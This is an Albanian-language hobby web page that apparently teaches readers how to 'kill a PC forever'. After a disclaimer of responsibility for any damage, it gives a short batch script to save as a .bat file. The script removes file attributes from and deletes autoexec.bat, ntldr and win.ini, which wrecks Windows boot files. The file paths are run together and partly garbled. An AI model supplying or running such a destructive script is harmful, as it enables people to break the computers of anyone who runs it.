..:: Mire Se Vini Ne WwW.Rock-Risi.tk ::..
  Fikja pc pergjithmon
 
 
fillimisht ne nuk mbajm pergjegjsi per demet qe mund ti shkaktoni ju.


HAPIM notepadin dhe vendosim ket kod:@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.inie ruajm fajllin me qfar do emri nuk o me rendesi mirpo me prapashtesen .bat

per ta ruajtusi bat file tek rubrika text file document nderrojni ne all files.
 

Add comment to this page:
Your Name:
Your Email address:
Your message:
 
   
 
=> Do you also want a homepage for free? Then click here! <=